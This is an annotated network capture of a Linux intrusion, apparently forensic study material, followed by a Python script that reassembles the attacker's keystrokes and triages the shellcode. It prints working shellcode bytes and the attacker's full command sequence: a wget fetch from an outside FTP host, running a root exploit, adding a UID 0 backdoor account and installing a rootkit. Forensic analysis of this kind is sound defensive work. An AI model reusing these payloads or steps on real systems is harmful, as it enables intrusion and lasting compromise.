10/26-01:59:45.898293 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x7A
xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42170 IpLen:20 DgmLen:108 DF
***AP*** Seq: 0x331D2CB1  Ack: 0x1CE99A67  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 119471420 11526911
31 C9 80 C1 03 31 C0 B0 3F 49 CD 80 75 F7 31 C9  1....1..?I..u.1.
F7 E1 51 5B B0 A4 CD 80 31 C0 50 68 2F 2F 73 68  ..Q[....1.Ph//sh
68 2F 62 69 6E 89 E3 50 53 89 E1 99 B0 0B CD 80  h/bin..PS.......
31 DB F7 E3 40 CD 80 00                          1...@...

The 56-byte payload above is the shellcode: a dup2 loop that copies the descriptor in ebx (presumably the connection) over fds 2, 1 and 0, then setresuid(0,0,0), execve("/bin//sh") and exit; each CD 80 is an int 0x80.

Start an interactive /bin/bash

10/26-01:59:47.840032 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x6F
xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42205 IpLen:20 DgmLen:97 DF
***AP*** Seq: 0x331D2CE9  Ack: 0x1CE99A67  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 119471621 11526945
54 45 52 4D 3D 78 74 65 72 6D 3B 20 65 78 70 6F  TERM=xterm; expo
72 74 20 54 45 52 4D 3D 78 74 65 72 6D 3B 20 65  rt TERM=xterm; e
78 65 63 20 62 61 73 68 20 2D 69 0A 0A           xec bash -i..

Survey the victim host

10/26-01:59:48.102876 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x54
xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42206 IpLen:20 DgmLen:70 DF
***AP*** Seq: 0x331D2D16  Ack: 0x1CE99A67  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 119471647 11527139
75 6E 61 6D 65 20 2D 61 3B 20 69 64 3B 20 77 3B  uname -a; id; w;
0A 0A                                            ..

Now fetch the tool used to escalate to root

10/26-02:00:01.087751 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x4A
xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42226 IpLen:20 DgmLen:60 DF
***AP*** Seq: 0x331D2D28  Ack: 0x1CE99BC6  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 119472946 11527176
63 64 20 2F 74 6D 70 0A                          cd /tmp.
10/26-02:00:04.882959 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x4E
xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42245 IpLen:20 DgmLen:64 DF
***AP*** Seq: 0x331D2D30  Ack: 0x1CE99BD9  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 119473325 11528462
6D 6B 64 69 72 20 22 2E 2E 2E 22 0A              mkdir "...".

10/26-02:00:08.680056 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x4B
xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42266 IpLen:20 DgmLen:61 DF
***AP*** Seq: 0x331D2D3C  Ack: 0x1CE99BF0  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 119473705 11528868
63 64 20 22 2E 2E 2E 22 0A                       cd "...".

Get the tool

10/26-02:00:26.884480 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x7F
xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42290 IpLen:20 DgmLen:113 DF
***AP*** Seq: 0x331D2D4A  Ack: 0x1CE99C6C  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 119475525 11529373
wget ftp://xxx:xxxx@xxx.xxx.1.200/".. "/test.tgz

***AP*** Seq: 0x331D2DB7  Ack: 0x1CE99DF8  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 119491296 11546608
67 65 74 20 62 61 6E 67 0A                       get bang.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

10/26-02:04:06.360680 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x4F
xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42457 IpLen:20 DgmLen:65 DF
***AP*** Seq: 0x331D2DC0  Ack: 0x1CE99DF8  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 119497472 11546816
67 65 74 20 74 65 73 74 2E 74 67 7A 0A           get test.tgz.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

10/26-02:04:06.376540 0:D0:9:4E:46:C -> 0:50:FC:2B:1B:C5 type:0x800 len:0x42
192.168.20.1:443 -> xxx.xxx.113.196:2613 TCP TTL:64 TOS:0x0 ID:28870 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x1CE99DF8  Ack: 0x331D2DCD  Win: 0x7C70  TcpLen: 32
TCP Options (3) => NOP NOP TS: 11552993 119497472

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

10/26-02:06:05.999877 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x46
xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42479 IpLen:20 DgmLen:56 DF
***AP*** Seq: 0x331D2DCD  Ack: 0x1CE99DF8  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 119509436 11552993
62 79 65 0A                                      bye.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

10/26-02:06:06.018343 0:D0:9:4E:46:C -> 0:50:FC:2B:1B:C5 type:0x800 len:0x42
192.168.20.1:443 -> xxx.xxx.113.196:2613 TCP TTL:64 TOS:0x0 ID:29271 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x1CE99DF8  Ack: 0x331D2DD1  Win: 0x7C70  TcpLen: 32
TCP Options (3) => NOP NOP TS: 11564958 119509436

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Run bang to escalate to root

***AP*** Seq: 0x331D2DD1  Ack: 0x1CE99E20  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 119509978 11564973
63 68 6D 6F 64 20 2B 78 20 62 61 6E 67 0A        chmod +x bang.

10/26-02:06:14.396965 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x49
xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42517 IpLen:20 DgmLen:59 DF
***AP*** Seq: 0x331D2DDF  Ack: 0x1CE99E39  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 119510276 11565501
2E 2F 62 61 6E 67 0A                             ./bang.
10/26-02:06:14.439745 0:D0:9:4E:46:C -> 0:50:FC:2B:1B:C5 type:0x800 len:0x65
192.168.20.1:443 -> xxx.xxx.113.196:2613 TCP TTL:64 TOS:0x0 ID:29298 IpLen:20 DgmLen:87 DF
***AP*** Seq: 0x1CE99E40  Ack: 0x331D2DE6  Win: 0x7C70  TcpLen: 32
TCP Options (3) => NOP NOP TS: 11565800 119510276
62 75 67 20 65 78 70 6C 6F 69 74 65 64 20 73 75  bug exploited su
63 63 65 73 73 66 75 6C 6C 79 2E 0A 65 6E 6A 6F  ccessfully..enjo
79 21 0A                                         y!.

Change the password of the nobody account

10/26-02:06:22.406181 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x50
xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42553 IpLen:20 DgmLen:66 DF
***AP*** Seq: 0x331D2DE6  Ack: 0x1CE99E63  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 119511077 11565800
70 61 73 73 77 64 20 6E 6F 62 6F 64 79 0A        passwd nobody.

10/26-02:06:26.249476 0:D0:9:4E:46:C -> 0:50:FC:2B:1B:C5 type:0x800 len:0x5C
192.168.20.1:443 -> xxx.xxx.113.196:2613 TCP TTL:64 TOS:0x0 ID:29303 IpLen:20 DgmLen:78 DF
***AP*** Seq: 0x1CE99E76  Ack: 0x331D2E00  Win: 0x7C70  TcpLen: 32
TCP Options (3) => NOP NOP TS: 11566981 119511441
52 65 74 79 70 65 20 6E 65 77 20 55 4E 49 58 20  Retype new UNIX 
70 61 73 73 77 6F 72 64 3A 20                    password: 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

10/26-02:06:26.515085 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x42
xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42573 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x331D2E00  Ack: 0x1CE99E90  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 119511488 11566981

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

10/26-02:06:29.575436 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x4E
xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42585 IpLen:20 DgmLen:64 DF
***AP*** Seq: 0x331D2E00  Ack: 0x1CE99E90  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 119511794 11566981
6E 65 72 74 68 75 73 31 39 37 36 0A              nerthus1976.
Add a backdoor account named uid with UID 0 (note that the passwd-format line is appended to /etc/shadow rather than /etc/passwd)

10/26-02:06:45.506079 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x6D
xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42595 IpLen:20 DgmLen:95 DF
***AP*** Seq: 0x331D2E0C  Ack: 0x1CE99EE9  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 119513386 11567316
65 63 68 6F 20 75 69 64 3A 78 3A 30 3A 30 3A 3A  echo uid:x:0:0::
2F 3A 2F 62 69 6E 2F 62 61 73 68 20 3E 3E 20 2F  /:/bin/bash >> /
65 74 63 2F 73 68 61 64 6F 77 0A                 etc/shadow.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

10/26-02:06:45.525622 0:D0:9:4E:46:C -> 0:50:FC:2B:1B:C5 type:0x800 len:0x42
192.168.20.1:443 -> xxx.xxx.113.196:2613 TCP TTL:64 TOS:0x0 ID:29306 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x1CE99EE9  Ack: 0x331D2E37  Win: 0x7C70  TcpLen: 32
TCP Options (3) => NOP NOP TS: 11568909 119513386

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

10/26-02:06:49.733873 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x4E
xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42612 IpLen:20 DgmLen:64 DF
***AP*** Seq: 0x331D2E37  Ack: 0x1CE99EE9  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 119513809 11568909
70 61 73 73 77 64 20 24 75 69 64 0A              passwd $uid.
10/26-02:06:49.747136 0:D0:9:4E:46:C -> 0:50:FC:2B:1B:C5 type:0x800 len:0x55
192.168.20.1:443 -> xxx.xxx.113.196:2613 TCP TTL:64 TOS:0x0 ID:29308 IpLen:20 DgmLen:71 DF
***AP*** Seq: 0x1CE99EE9  Ack: 0x331D2E43  Win: 0x7C70  TcpLen: 32
TCP Options (3) => NOP NOP TS: 11569331 119513809
4E 65 77 20 55 4E 49 58 20 70 61 73 73 77 6F 72  New UNIX passwor
64 3A 20                                         d: 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

10/26-02:06:50.016972 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x42
xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42615 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x331D2E43  Ack: 0x1CE99EFC  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 119513838 11569331

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

10/26-02:06:53.261344 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x4E
xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x0 ID:42629 IpLen:20 DgmLen:64 DF
***AP*** Seq: 0x331D2E43  Ack: 0x1CE99EFC  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 119514162 11569331
6E 65 72 74 68 75 73 31 39 37 36 0A              nerthus1976.

Install the rootkit

10/26-02:07:01.483904 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x54
xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x0 ID:42669 IpLen:20 DgmLen:70 DF
***AP*** Seq: 0x331D2E5B  Ack: 0x1CE99F4D  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 119514984 11569998
74 61 72 20 7A 78 76 66 20 74 65 73 74 2E 74 67  tar zxvf test.tg
7A 0A                                            z.

10/26-02:07:07.757687 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x52
xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42725 IpLen:20 DgmLen:68 DF
***AP*** Seq: 0x331D2E6D  Ack: 0x1CE9A495  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 119515612 11570575
72 6D 20 2D 72 66 20 74 65 73 74 2E 74 67 7A 0A  rm -rf test.tgz.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

10/26-02:07:07.774136 0:D0:9:4E:46:C -> 0:50:FC:2B:1B:C5 type:0x800 len:0x42
192.168.20.1:443 -> xxx.xxx.113.196:2613 TCP TTL:64 TOS:0x0 ID:29385 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x1CE9A495  Ack: 0x331D2E7D  Win: 0x7C70  TcpLen: 32
TCP Options (3) => NOP NOP TS: 11571134 119515612

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

10/26-02:07:11.033743 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x4A
xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42738 IpLen:20 DgmLen:60 DF
***AP*** Seq: 0x331D2E7D  Ack: 0x1CE9A495  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 119515939 11571134
63 64 20 74 65 73 74 0A                          cd test.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

10/26-02:07:11.053901 0:D0:9:4E:46:C -> 0:50:FC:2B:1B:C5 type:0x800 len:0x42
192.168.20.1:443 -> xxx.xxx.113.196:2613 TCP TTL:64 TOS:0x0 ID:29386 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x1CE9A495  Ack: 0x331D2E85  Win: 0x7C70  TcpLen: 32
TCP Options (3) => NOP NOP TS: 11571462 119515939

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

10/26-02:07:16.475146 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x4C
xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42755 IpLen:20 DgmLen:62 DF
***AP*** Seq: 0x331D2E85  Ack: 0x1CE9A495  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 119516483 11571462
2E 2F 69 6E 73 74 61 6C 6C 0A                    ./install.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
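The annotations above were produced by reading the hex dumps by eye. As an added worked example (not part of the original capture or its analysis), the Python script below does the same job mechanically: it parses Snort `-dev` style packet dumps, reassembles the attacker-to-victim byte stream in sequence order, reports where the excerpt is missing packets, and runs a first-pass syscall triage on the shellcode packet. The sample input is three packet blocks copied from the capture above (the shellcode, the `exec bash -i` line and `cd /tmp`); the `uname -a` packet between the last two is left out on purpose so the gap check has something to report. The syscall name table is from the Linux i386 syscall table and the `mov al, imm8` heuristic is this example's own; neither comes from the page. Requires Python 3.8 or later.

```python
"""Reassemble the attacker's keystrokes from Snort -dev hex dumps and triage
the shellcode packet for Linux x86 int 0x80 system calls (added example)."""
import re

# Constructed sample: three packet blocks copied from the capture above. The
# `uname -a` packet between the last two is left out so the gap check fires.
SAMPLE = """\
10/26-01:59:45.898293 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x7A
xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42170 IpLen:20 DgmLen:108 DF
***AP*** Seq: 0x331D2CB1  Ack: 0x1CE99A67  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 119471420 11526911
31 C9 80 C1 03 31 C0 B0 3F 49 CD 80 75 F7 31 C9  1....1..?I..u.1.
F7 E1 51 5B B0 A4 CD 80 31 C0 50 68 2F 2F 73 68  ..Q[....1.Ph//sh
68 2F 62 69 6E 89 E3 50 53 89 E1 99 B0 0B CD 80  h/bin..PS.......
31 DB F7 E3 40 CD 80 00                          1...@...
10/26-01:59:47.840032 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x6F
xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42205 IpLen:20 DgmLen:97 DF
***AP*** Seq: 0x331D2CE9  Ack: 0x1CE99A67  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 119471621 11526945
54 45 52 4D 3D 78 74 65 72 6D 3B 20 65 78 70 6F  TERM=xterm; expo
72 74 20 54 45 52 4D 3D 78 74 65 72 6D 3B 20 65  rt TERM=xterm; e
78 65 63 20 62 61 73 68 20 2D 69 0A 0A           xec bash -i..
10/26-02:00:01.087751 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x4A
xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42226 IpLen:20 DgmLen:60 DF
***AP*** Seq: 0x331D2D28  Ack: 0x1CE99BC6  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 119472946 11527176
63 64 20 2F 74 6D 70 0A                          cd /tmp.
"""

TS_RE = re.compile(r"^\d\d/\d\d-\d\d:\d\d:\d\d\.\d+ ")
IP_RE = re.compile(r"^(\S+):(\d+) -> (\S+):(\d+) TCP .*IpLen:(\d+) DgmLen:(\d+)")
TCP_RE = re.compile(r"Seq: 0x([0-9A-Fa-f]+)\s+Ack: 0x[0-9A-Fa-f]+.*TcpLen: (\d+)")
HEX_TOKEN = re.compile(r"^[0-9A-F]{2}$")
SYSCALLS = {0x01: "exit", 0x0B: "execve", 0x3F: "dup2", 0x66: "socketcall", 0xA4: "setresuid"}  # i386

def parse_snort_dump(text):
    """Return [{src, dst, seq, payload}] from snort -dev style output. Payload
    length is DgmLen - IpLen - TcpLen and a dump line holds at most 16 bytes,
    so the ASCII column is never misread as hex even with collapsed padding."""
    packets, cur = [], {"payload": bytearray(), "expect": None}  # dummy until first timestamp
    for line in text.splitlines():
        if TS_RE.match(line):                               # timestamp = new packet
            cur = {"payload": bytearray(), "expect": None}
            packets.append(cur)
        elif (m := IP_RE.match(line)):
            cur["src"], cur["dst"] = f"{m[1]}:{m[2]}", f"{m[3]}:{m[4]}"
            cur["hdr"], cur["dgm"] = int(m[5]), int(m[6])
        elif (m := TCP_RE.search(line)) and "dgm" in cur:
            cur["seq"] = int(m[1], 16)
            cur["expect"] = cur["dgm"] - cur["hdr"] - int(m[2])
        elif cur["expect"] is not None:                     # hex dump line
            for n, tok in enumerate(line.split()):
                if n == 16 or len(cur["payload"]) == cur["expect"] or not HEX_TOKEN.match(tok):
                    break
                cur["payload"].append(int(tok, 16))
    return [p for p in packets if p["expect"] is not None]

def reassemble(packets, src, dst):
    """Join one direction's payloads in sequence order. Missing bytes become
    b"[gap]" in the stream and (seq, length) in gaps; retransmitted overlap is
    dropped. No 32-bit sequence wrap handling."""
    flow = sorted((p for p in packets if (p.get("src"), p.get("dst")) == (src, dst)
                   and p["payload"]), key=lambda p: p["seq"])
    out, gaps, nxt = bytearray(), [], None
    for p in flow:
        if nxt is not None and p["seq"] > nxt:
            gaps.append((nxt, p["seq"] - nxt))
            out += b"[gap]"
        skip = 0 if nxt is None else max(0, nxt - p["seq"])
        out += p["payload"][skip:]
        nxt = max(nxt or 0, p["seq"] + len(p["payload"]))
    return bytes(out), gaps

def int80_syscalls(code):
    """Heuristic triage: for each int 0x80 (CD 80) report the syscall number
    loaded by the nearest preceding mov al, imm8 (B0 xx); with no such mov,
    count the inc eax (40) bytes right before the trap (how this shellcode
    reaches exit). An operand byte of B0 would fool it; confirm with
    objdump -D -b binary -m i386."""
    found = []
    for i in range(len(code) - 1):
        if code[i:i + 2] != b"\xCD\x80":
            continue
        nr = next((code[j + 1] for j in range(i - 2, max(i - 8, -1), -1)
                   if code[j] == 0xB0), None)
        if nr is None:
            k = i
            while k > 0 and code[k - 1] == 0x40:
                k -= 1
            nr = i - k or None                              # zero increments: unknown
        found.append((i, nr, SYSCALLS.get(nr, "?")))
    return found

def attacker_transcript(text, src="xxx.xxx.113.196:2613", dst="192.168.20.1:443"):
    """Stream and gaps for one direction plus a triage of its first payload."""
    packets = parse_snort_dump(text)
    stream, gaps = reassemble(packets, src, dst)
    first = next(p["payload"] for p in packets if (p.get("src"), p.get("dst")) == (src, dst))
    return stream, gaps, int80_syscalls(bytes(first))
```

`attacker_transcript(SAMPLE)` returns the shellcode followed by `TERM=xterm; export TERM=xterm; exec bash -i`, then a `[gap]` marker where the 18 bytes of `uname -a; id; w;` are missing, then `cd /tmp`; the gap list pins it to sequence 0x331D2D16, and the triage lists dup2, setresuid, execve and exit at offsets 10, 22, 46 and 53. On the full capture, feed the whole dump in and swap `src` and `dst` to get the victim's side (the passwd prompts and the "bug exploited successfully" banner).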